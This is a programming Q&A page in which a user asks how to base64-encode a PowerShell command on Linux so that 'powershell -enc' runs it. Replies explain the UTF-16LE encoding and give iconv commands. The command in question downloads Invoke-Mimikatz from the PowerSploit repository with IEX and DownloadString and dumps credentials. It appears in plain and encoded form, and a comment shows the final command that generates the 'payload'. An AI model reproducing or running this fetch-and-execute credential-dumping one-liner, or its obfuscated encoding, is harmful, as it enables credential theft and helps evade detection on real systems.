4

I want to execute base64 encoded commands in powershell. For example, I took a command from this github repo: https://gist.github.com/gfoss/ca6aa37f97fd400ff14f. Running the mimikatz one:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m

If I run it straight in a powershell prompt, it works correctly. Checking the base64 encoded version, I see that it also works correctly:

powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==

However, Im not sure how that string was encoded. If I try to encode it in Linux, I get a different string (I just changed the quotes to prevent bash interpretating the $):

echo -e 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/Powe
rSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m' | openssl enc -base64 -A

SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vUG93ZXJTaGVsbE1hZmlhL1Bvd2VyU3Bsb2l0L21hc3Rlci9FeGZpbHRyYXRpb24vSW52b2tlLU1pbWlrYXR6LnBzMSIpOyAkbSA9IEludm9rZS1NaW1pa2F0eiAtRHVtcENyZWRzOyAkbQo=

This encoding fails when I try to run it with powershell -enc.

What encoding should I use to make the string completely compatible with powershell?

Improve this question

2 Answers 2

Reset to default
6

PowerShell expects the base64 string to be Unicode encoded - and Unicode is Windows-lingo for little-endian UTF-16.

You can use iconv to convert to UTF-16LE if you need to encode a PowerShell command from a linux shell without access to .NET:

iconv -f ASCII -t UTF-16LE filename.txt |base64 -w 0
Improve this answer
Sign up to request clarification or add additional context in comments.

6 Comments

Indeed (+1); to adapt this to providing the string via stdin: printf %s '...' | iconv -t UTF-16LE | base64 -w 0.
iconv -f ASCII -t UTF-16LE <(echo "Write-Host 'wassup!'") |base64 -w 0 if you just want to drop a string in there at the cli
Yes, but there's no advantage to using a process substitution over the pipeline here Also, avoid echo to prevent problems with behavior variations across shells and strings that start with -. Last not least: echo appends a trailing newline, which doesn't matter here, but may in other contexts.
P.S.: If an extra trailing newline is not a concern, the simplest solution in bash, ksh, and zsh (but not POSIX-features-only shells such as dash) is to use a here-string: iconv -f ASCII -t UTF-16LE <<<"Write-Host 'wassup!'"
Thanks, this is awesome. I had to use double quotes inside the powershell command and wrap everything in single quotes to prevent the special chars being interpreted by bash (eg $). The final command used to generate the payload was: iconv -f ASCII -t UTF-16LE <<<'IEX (New-Object Net.WebClient).DownloadString(" raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/…); $m = Invoke-Mimikatz -DumpCr eds; $m' | base64 -w 0
|
3

use one from the powershell examples?

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("command_goes_here"))
Improve this answer

3 Comments

But I need to encode it from a Linux box, not natively. I'm guessing it has something to do with the encoding.
Besides, I just tried it and it didin't work that way either. (The code is too long to post it in a reply, but it fails with The term '=' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:154" )
$ echo -n "your text" | iconv -f UTF8 -t UTF16LE | base64

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.